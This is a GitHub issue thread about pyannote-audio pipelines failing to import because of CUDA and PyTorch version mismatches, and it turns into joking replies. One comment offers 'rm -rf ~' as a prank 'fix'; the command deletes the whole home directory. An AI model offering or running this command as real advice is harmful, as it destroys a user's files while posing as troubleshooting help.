### ISSUE TITLE
A version of pyannote that functions

### ISSUE THREAD

**Issue by kronkinatorix** [pyannote/pyannote-audio#1393]
**Is your feature request related to a problem? Please describe.**
any attempt to import any pipeline results in a module not found error. All of the pretrained models appear to be tied to a version of cuda / pytorch that isn't available for download anytmore. 

**Describe the solution you'd like**
I'd like to be able to import pyannote modules and use a version of cuda that exists. 

**Describe alternatives you've considered**
Destroying my computer and going to live in the woods. 

**Additional context**
why

**Comment by hbredin** [comment]
Did you try to reboot your computer?

**Comment by kronkinatorix** [comment]
I sure did.

**Comment by MarvinLvn** [comment]
I encountered the same issue and fixed it with:

```
rm -rf ~
```

Hope this helps!

**Comment by kronkinatorix** [comment]
yeah what would I need a home directory for anyway?

**Comment by hadware** [comment]
I had the same problem but the FAQtory bot's suggestion really helped, so you might want to try that first before setting your computer on fire.

**Comment by rohansharma777** [comment]
Close this thread as the computer is ashes now.
